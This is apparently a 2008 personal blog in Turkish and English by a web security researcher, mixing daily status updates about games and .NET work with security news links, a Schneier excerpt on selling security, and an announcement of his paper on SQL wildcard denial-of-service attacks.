8:56 AM: fmavituna: @YuSuPh CSS sorunu cozmeyecektir, cunku kod yazamiyorsun ya da yalandan expression JS si yazacaksin, ama XSLT server-side da calisir
8:25 AM: fmavituna: update your Screwturns wikis, a nasty permanent XSS fixe - http://www.screwturn.eu/Download.ashx
8:23 AM: fmavituna: @YuSuPh Aslinda bence XSTL boku bu kadar salak ve karmasik olmasaydi bu tip isler cok daha rahat ve global olarak cozulebilirlerdi.
8:23 AM: fmavituna: @YuSuPh template sisteminin yazman gerekmiyor bence RSS' i reader i ve template sistemini ayri ayri alip adam gibi birlestirmek te yetebilir

Turk.internet.com | Skandal : Deutch Telekom Gazetecileri Dinlerken Yakalandı |
LazyParser.NET - Home
Envy Code R preview #7 (scalable coding font) » DamienG

Who should perform security testing
E-trade, Schwab, Google fall victim to “Office Space/Superman 3″ attack
Notes from IEEE Web 2.0 Security and Privacy Workshop (W2SP2008)
Unpatched Flash Vulnerability Widely Exploited in the Wild
Yeni internet kanunu ve getirdikleri hatta götürecekleri…
Notes from IEEE Web 2.0 Security and Privacy Workshop (W2SP2008)

26-27.05.08 - Trials 2 ve Penny Arcade Adventures

Ferruh Mavituna — Çar, 28 May 2008 00:34:33 +0300

Ne Yapıyorum

Penny Arcade Adventures' i bitirdim, NetBouncer projesi üzerinde çalışmaya devam ediyorum, en sonunda çalışır hale geldi. İşler gayet yoğun, boş kalan vakitte de Trials 2' i oynadım.

27 May 2008

8:12 PM: fmavituna: justr found another good game : http://www.redlynxtrials.com/
5:53 PM: fmavituna: watching prison break
2:55 PM: fmavituna: Seasonal affective disorder - internet baglantimi test ederken asd aratmaktan bu terim ile bolca karsilasir oldum
2:33 PM: fmavituna: The Escapist - http://www.escapistmagazine.com Best gaming culture magazine. I just love reading it.
1:15 PM: fmavituna: interesting project, google-caja - http://code.google.com/p/google-caja/

One solution is to stoke fear. Fear is a primal emotion, far older than our...

One solution is to stoke fear. Fear is a primal emotion, far older than our ability to calculate trade-offs. And when people are truly scared, they're willing to do almost anything to make that feeling go away; lots of other psychological research supports that. Any burglar alarm salesman will tell you that people buy only after they've been robbed, or after one of their neighbors has been robbed. And the fears stoked by 9/11, and the politics surrounding 9/11, have fueled an entire industry devoted to counterterrorism. When emotion takes over like that, people are much less likely to think rationally.

Though effective, fear mongering is not very ethical. The better solution is not to sell security directly, but to include it as part of a more general product or service. Your car comes with safety and security features built in; they're not sold separately. Same with your house. And it should be the same with computers and networks. Vendors need to build security into the products and services that customers actually want. CIOs should include security as an integral part of everything they budget for. Security shouldn't be a separate policy for employees to follow but part of overall IT policy.

Security sellers know this, even if they don't understand why, and are contin...

Security sellers know this, even if they don't understand why, and are continually trying to frame their products in positive results. That's why you see slogans with the basic message, "We take care of security so you can focus on your business," or carefully crafted ROI models that demonstrate how profitable a security purchase can be. But these never seem to work. Security is fundamentally a negative sell.

But Kahneman's and Tversky's experiments contradicted Utility Theory. When fa...

But Kahneman's and Tversky's experiments contradicted Utility Theory. When faced with a gain, about 85 percent of people chose the sure smaller gain over the risky larger gain. But when faced with a loss, about 70 percent chose the risky larger loss over the sure smaller loss.
...
Lions, for example, chase young or wounded wildebeests because the investment needed to kill them is lower. Mature and healthy prey would probably be more nutritious, but there's a risk of missing lunch entirely if it gets away.

9:58 AM: fmavituna: reading - http://tinyurl.com/6kyz56 , Schneier is so much into psychology-security relation nowadays.
9:32 AM: fmavituna: trying to finish his todo list in the office

How to Sell Security

26 May 2008

11:32 PM: fmavituna: playing audio-surf, such a brilliant idea ! - http://www.audio-surf.com/
4:30 PM: fmavituna: browsing gametap
3:24 PM: fmavituna: what a day!, it's pouring outside, MGS4 has not out yet, and Iron Man tickets sold out...
12:38 PM: fmavituna: going to Harrow to watch Iron Man and buy MSG4, Bank Holiday FTW!
12:32 PM: fmavituna: @YuSuPh :D yok ya bu aralar elimde bir suru proje var ama belki onlar bittikten sonra, http://code.google.com/p/netbouncer/ u bitireyim de
11:44 AM: fmavituna: @YuSuPh Guzelmis aslinda ama WP, Bence yapilmasi gereken adam gibi template sistemi destekleyen bir RSS reader yazip siteye entegere etmek
11:41 AM: fmavituna: finished penny arcade adventures, that was short!

22-25.05.2005 - Age of Conan, Input Validation

Ferruh Mavituna — Pzt, 26 May 2008 10:45:01 +0300

Ne Yapıyorum

Penny Arcade Adventures ve Age of Conan oynuyorum. Yeni bir .NET projesi olan NetBouncer üzerinde çalışıyorum. Bu bir güvenlik kütüphanesi, inşallah bir kaç haftaya kadar yayınlayanabilecek hale gelecek. Web Application Hackers Handbook' u okuyorum. %75' ine falan geldim.

25 May 2008

8:21 PM: fmavituna: penny arcade's game - not brilliant but it's ok - http://www.hotheadgames.com/pa.php
7:45 PM: fmavituna: myspace for developers - www.ohloh.net - brilliant though

owaspantisamy - Google Code
Modifying HTTPContext variables ASP.NET Forums

24 May 2008

9:51 PM: fmavituna: age of conan is another good example of MMORPG is dead and gonna stay that way, I think future is only bright for games like Guild Wars.

Top vulnerability researcher?

23 May 2008

7:16 PM: fmavituna: installing age of conan
11:37 AM: fmavituna: yeah finally figured out the name of this movie, adding to my que in lovefilm. - Poltergeist III
9:03 AM: fmavituna: @YuSuPh bende noel baba yi gordum, simdi de ruya tabirlerinde ruyada santa gormek diye ariyorum :p

Microsoft Source Analysis for C# Released

22 May 2008

9:32 PM: fmavituna: Brilliant piece of tool from MS for better TDD, it's a shame that I use MbUnit - http://research.microsoft.com/pex/default.aspx

OWASP Validation Library url

2:37 PM: fmavituna: nowadays focused on most effective input/output validation process
12:21 PM: fmavituna: new PSN update, Bourne and Iron Man demos

Prof. Dr. Şahin Albayrak; Türkiye zor bir ortam. Burada herkes herşeyi biliyo...

Prof. Dr. Şahin Albayrak; Türkiye zor bir ortam. Burada herkes herşeyi biliyor. Asıl sorun bu.

8:24 AM: fmavituna: Another great racing game from codemasters - GRID - http://www.racedrivergrid.com/ , PS3 demo is out give it a host, real fun.

Activator.CreateInstance Method (Type, Object[]) (System)
CodeProject: Decoding the Mysteries of .NET 2.0 Configuration. Free source code and programming help
Simple Validators in System.Configuration : Keyvan Nayyeri
Pex - Automated Exploratory Testing for .Net
Configure This: Parameterize Your Apps Using XML Configuration In The .NET Framework 2.0
CodeProject: .NET 2.0 Configuration and Provider Model. Free source code and programming help

Kapanmayan blog istiyoruz
ücretsiz proje yönetim sistemleri karşılaştırması

Günlük Maceralar - 18-21.05.08

Ferruh Mavituna — Çar, 21 May 2008 20:15:54 +0300

21 May 2008

Most programming environments are meta-engineered to make typical software ea...
Most programming environments are meta-engineered to make typical software easier to write. They should instead be meta-engineered to make incorrect software harder to write.

3:46 PM: fmavituna: FF 3 extension compatibility trick, easier then modifying xpi packages manually http://tech.slashdot.org/tech/08/05/21/015245.shtml
3:39 PM: fmavituna: This is great : Zero Punctuation series - http://tinyurl.com/6by8vf
2:54 PM: fmavituna: wow, http://tinyurl.com/6zr5lb , this is the curse of working on security, you are being paranoid.
1:27 PM: fmavituna: got my copy of web app. hackers handbook, good reference book.
1:27 PM: fmavituna: received age of conan shipping confirmation, looking forward to play
12:22 PM: fmavituna: @tehlike password cracking in virtual machine got so much overhead really, I used another dedicated native box for this.
10:22 AM: fmavituna: @sonereker kesinlikle, ben killanmaya baslamistim acaba sorun sadece ben de mi diye
10:22 AM: fmavituna: why there is no MPI version of JTR for windows! I knew I should ditch windows ages ago!
8:23 AM: fmavituna: google reader keep getting down this morning

Qmail Security

Of Aviation Crashes and Software Bugs
Spying on Computer Monitors Off Reflective Objects
Krai Mira: Work in Progress MMO
Bir OWASP SoC’08 Projesi - SQLiBENCH
Krai Mira: Work in Progress MMO

20 May 2008

1:52 PM: fmavituna: the question is when are we gonna stop caring about stuff and start saying "fuck it"

Lingoes -- free dictionary and full text translation software
ThinkGeek :: you are dumb v1.0
ThinkGeek :: The Dice Are Trying to Kill Me
ThinkGeek :: Prefectionist
ThinkGeek :: No, I will not fix your computer
ThinkGeek :: I see dead pixels.

STYLEISLAM.COM

Babylon Alternatifi ucretsiz sozluk programi
DoS Attacks Using SQL Wildcards Revealed
Firefox applet fun
Academia vs. professional researchers

19 May 2008

6:51 PM: fmavituna: The Big Issue: Shall I get Fallout 3 for PC or PS3 ?
12:28 PM: fmavituna: if you are a developer or a security guy, then you might wanna read this : http://tinyurl.com/6b7q6g
11:00 AM: fmavituna: weird, FF removed yellow background from SSL URLs and and it's not clear if URL is over SSL. Why? why? why?
10:25 AM: fmavituna: this is awesome, bionic commando 2d NG - http://www.gametrailers.com/player/29799.html
9:23 AM: fmavituna: lol - http://www.thinkgeek.com/apparel/jewelry/a38d/
8:23 AM: fmavituna: yay new FF update!

SQL Wildcard Saldırıları
Random Number Bug in Debian Linux
Spanish police cuff web defacement crew
Website Defacement Group Arrested After Going too far
Phishing Nedir ? Ne Amaçla Kullanılır , Anlatımı

SQL Wildcard Saldırıları

Ferruh Mavituna — Pzt, 19 May 2008 20:12:55 +0300

Özellikle arka planında MS SQL Server veritabanı çalışan web uygulamalarının çok geniş bir bölümünün açık olduğu bir açık bu. Konuyu detaylı şekilde örneklerle yazmaya çalıştım. Eğer bir geliştiriciyseniz hemen gidin ve uygulamanızı yamayın eğer bir güvenlikçiyseniz de bunu test listenize ekleyin.

Maalesef doküman Türkçe değil, İngilizce olarak DoS attacks using SQL Wildcards' ı download edin.

Günlük Maceralar - 18.05.08

Ferruh Mavituna — Pzt, 19 May 2008 02:25:50 +0300

18 May 2008

10:49 AM: fmavituna: waiting for bbq to be ready
Custom configuration for NET 2.0 « Incomplete Leo
Xml Serializer Section Handler
Class From Config for C#.NET - wiki.webgear.co.nz
Assembly.LoadFrom demystified
Microsoft Enterprise Library for .NET 2.0: Configuration

Günlük Maceralar

Ferruh Mavituna — Cmt, 17 May 2008 11:20:03 +0300

Bundan sonra her günün sonunda o günkü diğer paylaşımlarımı da buradan not düşmeye karar verdim. İnşallah her günün sonunda bu şekilde bir yazı olacak.

17 May 2008

WCF Security Best Practices - OWASP
Güvenlik ve Paranoya
11 Top Tips for a Successful Technical Presentation

16 May 2008

11:39 AM: fmavituna: this is one is pretty fast : http://tinyurl.com/5fxdkj
11:38 AM: fmavituna: just seen a test box been owned because of debian weak key stuff, that's pretty cool.
11:19 AM: fmavituna: just installed latest w3af from latest svn, it looks good but configuring tests are soooo boring and takes ages
Welcome to AbstractSpoon Software - Where everything is
Esperanto | Umutların Evrensel Dili
Security Holes

15 May 2008

8:09 AM: fmavituna: this is worse than I thought "the only "random" value that was used was the current process ID" - http://tinyurl.com/5httdb
CodeProject: .NET Internals and Code Injection. Free source code and programming help
CodeProject: Assembly Manipulation and C#/VB.NET Code Injection. Free source code and programming help
PHP: List of Supported Protocols/Wrappers - Manual
Debian OpenSSL Predictable PRNG Toys
Giving SQL Injection the Respect it Deserves
Ghost Busters
String Format - Made Simple
OphCrack 3.0 in the wild
The Ethics of Vulnerability Research
New Botnet Malware Spreading SQL Injection Attack Tool
Metasploit Release Database of Weak SSH Keys for Debian OpenSSL Vuln